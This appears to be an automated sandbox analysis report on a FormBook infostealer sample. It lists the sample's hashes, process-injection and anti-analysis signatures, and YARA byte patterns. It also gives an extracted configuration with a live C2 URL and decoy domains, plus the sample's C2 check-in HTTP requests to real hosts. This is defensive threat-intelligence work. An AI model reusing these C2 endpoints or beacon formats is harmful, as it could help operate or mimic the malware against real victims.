

Analysis Report hvEop8Y70Y.exe

Overview

General Information

Sample Name: hvEop8Y70Y.exe
Analysis ID: 383848
MD5: bd7e988ed1d92f9faf32f6a817d89329
SHA1: 4ab28bec26ad120653ca060a4c735befded7551e
SHA256: 94b77677478f890b5f9e0561aebc0f66b1b2fc4494d016e9b5a70ed0ba20980b
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • hvEop8Y70Y.exe (PID: 6364 cmdline: 'C:\Users\user\Desktop\hvEop8Y70Y.exe' MD5: BD7E988ED1D92F9FAF32F6A817D89329)
    • hvEop8Y70Y.exe (PID: 6668 cmdline: C:\Users\user\Desktop\hvEop8Y70Y.exe MD5: BD7E988ED1D92F9FAF32F6A817D89329)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 3536 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6776 cmdline: /c del 'C:\Users\user\Desktop\hvEop8Y70Y.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.okitmall.com/iu4d/"], "decoy": ["abbottdigitalhealthpass.com", "peridot.website", "emmajanetracy.com", "arewedoingenough.com", "mvprunning.com", "xn--939au40bijas7ab2a93s.com", "thehouseofchiron.com", "sqzffn.com", "moretuantired.com", "rosewoodcibubur.com", "warungjitu.com", "armylord.net", "rideequihome.com", "girasol.zone", "getboostphlo.com", "bilradioplaza.com", "japannxt.com", "figulco.com", "insershop.com", "loktantratvnews.com", "healthdatamonitoring.com", "gmopanama.com", "miguelchulia.com", "appexivo.com", "weluvweb.com", "qqcaotv.com", "aleyalifestyle.com", "aratssycosmetics.com", "chestfreezersale.xyz", "gyanumbrella.com", "betbonusuk.com", "dostforimpact.net", "lestlondon.com", "theartsutra.com", "finegiant.com", "zacharypelletier.com", "ux300e.com", "wiglous.club", "adamspartnership.com", "contex33.xyz", "appearwood.club", "3m-mat.com", "runcouver.com", "cqsjny.com", "totubemp3.net", "imagecloudhost.com", "appleadayjuice.com", "energyoutline.com", "yashaerotech.com", "mcleancosmeticgynecology.com", "georgicarealty.com", "sellbulkweed.com", "kardosystems.com", "hubsnewz.com", "ekstrafordunyasi.com", "cymentor.com", "morrealeestates.com", "mumbaihotgirls.club", "beaulaser.com", "aa29996.com", "ankaramasozlerburada.xyz", "otmcleaningservice.com", "rosaandray.com", "omxpro.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.hvEop8Y70Y.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
4.2.hvEop8Y70Y.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.hvEop8Y70Y.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x158a9:$sqlite3step: 68 34 1C 7B E1
  • 0x159bc:$sqlite3step: 68 34 1C 7B E1
  • 0x158d8:$sqlite3text: 68 38 2A 90 C5
  • 0x159fd:$sqlite3text: 68 38 2A 90 C5
  • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
0.2.hvEop8Y70Y.exe.2f43d44.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
4.2.hvEop8Y70Y.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: hvEop8Y70Y.exe | Avira: detected
Found malware configuration
Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.okitmall.com/iu4d/"], "decoy": ["abbottdigitalhealthpass.com", "peridot.website", "emmajanetracy.com", "arewedoingenough.com", "mvprunning.com", "xn--939au40bijas7ab2a93s.com", "thehouseofchiron.com", "sqzffn.com", "moretuantired.com", "rosewoodcibubur.com", "warungjitu.com", "armylord.net", "rideequihome.com", "girasol.zone", "getboostphlo.com", "bilradioplaza.com", "japannxt.com", "figulco.com", "insershop.com", "loktantratvnews.com", "healthdatamonitoring.com", "gmopanama.com", "miguelchulia.com", "appexivo.com", "weluvweb.com", "qqcaotv.com", "aleyalifestyle.com", "aratssycosmetics.com", "chestfreezersale.xyz", "gyanumbrella.com", "betbonusuk.com", "dostforimpact.net", "lestlondon.com", "theartsutra.com", "finegiant.com", "zacharypelletier.com", "ux300e.com", "wiglous.club", "adamspartnership.com", "contex33.xyz", "appearwood.club", "3m-mat.com", "runcouver.com", "cqsjny.com", "totubemp3.net", "imagecloudhost.com", "appleadayjuice.com", "energyoutline.com", "yashaerotech.com", "mcleancosmeticgynecology.com", "georgicarealty.com", "sellbulkweed.com", "kardosystems.com", "hubsnewz.com", "ekstrafordunyasi.com", "cymentor.com", "morrealeestates.com", "mumbaihotgirls.club", "beaulaser.com", "aa29996.com", "ankaramasozlerburada.xyz", "otmcleaningservice.com", "rosaandray.com", "omxpro.com"]}
Multi AV Scanner detection for submitted file
Source: hvEop8Y70Y.exe | Virustotal: Detection: 25%
Source: hvEop8Y70Y.exe | ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match | File source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: hvEop8Y70Y.exe | Joe Sandbox ML: detected
Source: 4.2.hvEop8Y70Y.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: hvEop8Y70Y.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: hvEop8Y70Y.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: hvEop8Y70Y.exe, 00000004.00000002.312279182.00000000014B0000.00000040.00000001.sdmp, raserver.exe, 0000000E.00000002.509423103.000000000459F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: hvEop8Y70Y.exe, raserver.exe
Source: Binary string: RAServer.pdb source: hvEop8Y70Y.exe, 00000004.00000002.312209416.0000000001440000.00000040.00000001.sdmp
Source: Binary string: RAServer.pdbGCTL source: hvEop8Y70Y.exe, 00000004.00000002.312209416.0000000001440000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\hvEop8Y70Y.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 198.148.114.222:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 198.148.114.222:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 198.148.114.222:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 172.67.187.138:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 172.67.187.138:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 172.67.187.138:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.okitmall.com/iu4d/
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=C3lw6nN8/wjOPd8oaAysox0kMoLppKhEiaq8wux9+N+u3aHHhZKc4gso1l+tbzGLEbBg&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.runcouver.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=uttTwOCOH1jEV+6/PDkH2rgXUcJbpZgk8NMf80qhjrLzhrhL9Yums4YmXY+CUKk4Lsjl&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.aa29996.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=JvjSk9WUlBdgONG69H9sib5J4SPt/vPlwOmf1A06UqzVvRJVghpTE97et7kDme6aF6nY&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.ux300e.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=7Tv9DsBa2x/9+7rHtb45a2p9TOUpHuLwXvGhoZyRj+FM5Jpy0KtmokI2zSCU3HKaraDa&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.mvprunning.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=dTiXV4CFE3yVJbJPtbi4kS8L9e4gDLsfvJEyPJQwpK+wIZV6SF5bJNAnffOAlybNEFfC&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.getboostphlo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrA3L99pwBOY&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.okitmall.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=y4JxQtggtXVUGlOHrdhsWpYE5Q5QdQRqM5s9avj6g1ZOxqioacxcZohZ3CHAJSRBFHfe&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.cqsjny.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT09VD1VuWTt&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.betbonusuk.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=a4TwvNFJUHZfYjxmJDGfKucvC3Kvi9GvZt2BYG7bsK78eAq1dsPAQngdGmiuB14d735P&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.yashaerotech.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 52.58.78.16 52.58.78.16
Source: Joe Sandbox View | IP Address: 15.165.26.252 15.165.26.252
Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View | ASN Name: LEASEWEB-USA-LAX-11US LEASEWEB-USA-LAX-11US
Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=C3lw6nN8/wjOPd8oaAysox0kMoLppKhEiaq8wux9+N+u3aHHhZKc4gso1l+tbzGLEbBg&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.runcouver.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=uttTwOCOH1jEV+6/PDkH2rgXUcJbpZgk8NMf80qhjrLzhrhL9Yums4YmXY+CUKk4Lsjl&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.aa29996.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=JvjSk9WUlBdgONG69H9sib5J4SPt/vPlwOmf1A06UqzVvRJVghpTE97et7kDme6aF6nY&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.ux300e.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=7Tv9DsBa2x/9+7rHtb45a2p9TOUpHuLwXvGhoZyRj+FM5Jpy0KtmokI2zSCU3HKaraDa&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.mvprunning.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=dTiXV4CFE3yVJbJPtbi4kS8L9e4gDLsfvJEyPJQwpK+wIZV6SF5bJNAnffOAlybNEFfC&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.getboostphlo.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrA3L99pwBOY&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.okitmall.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=y4JxQtggtXVUGlOHrdhsWpYE5Q5QdQRqM5s9avj6g1ZOxqioacxcZohZ3CHAJSRBFHfe&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.cqsjny.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT09VD1VuWTt&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.betbonusuk.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iu4d/?AR6=a4TwvNFJUHZfYjxmJDGfKucvC3Kvi9GvZt2BYG7bsK78eAq1dsPAQngdGmiuB14d735P&nflLiT=xPJxAxbPf HTTP/1.1 Host: www.yashaerotech.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.runcouver.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 08 Apr 2021 09:05:22 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Set-Cookie: __cfduid=dfb3971d4184d632d73a1908cbee311771617872722; expires=Sat, 08-May-21 09:05:22 GMT; path=/; domain=.getboostphlo.com; HttpOnly; SameSite=Lax CF-Cache-Status: DYNAMIC cf-request-id: 095253b1640000a8c13d238000000001 Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2F802H7kHqNcGEaM19LIsT0HTjHrjpPBTypNS7vtOf80a0axYnOpC46oJeo%2FijRhoiKFT5as3D5%2FwxLegLD2FcS%2FMFN%2BWUhKGAQQySsVBK6%2BbwWISsw%3D%3D"}],"group":"cf-nel"} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 63ca55623926a8c1-CDG alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 75 34 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /iu4d/ was not found on this server.</p></body></html>
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hvEop8Y70Y.exe | String found in binary or memory: http://tempuri.org/GridOneHSDataSet.xsd
Source: hvEop8Y70Y.exe | String found in binary or memory: http://tempuri.org/HighScoresDataSet.xsd
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, hvEop8Y70Y.exe, 00000000.00000003.246364868.0000000005DCD000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: hvEop8Y70Y.exe, 00000000.00000002.266638944.0000000005DC0000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comm
Source: hvEop8Y70Y.exe, 00000000.00000003.238351604.0000000005DDB000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: hvEop8Y70Y.exe, 00000000.00000003.238351604.0000000005DDB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comX
Source: hvEop8Y70Y.exe, 00000000.00000003.238351604.0000000005DDB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comcj
Source: hvEop8Y70Y.exe, 00000000.00000003.238491766.0000000005DDB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comic
Source: hvEop8Y70Y.exe, 00000000.00000003.238413554.0000000005DDB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comn
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: hvEop8Y70Y.exe, 00000000.00000003.240959056.0000000005DC4000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/Li
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: hvEop8Y70Y.exe, 00000000.00000003.240959056.0000000005DC4000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/omh#?oy
Source: hvEop8Y70Y.exe, 00000000.00000003.240642231.0000000005DFD000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnd
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
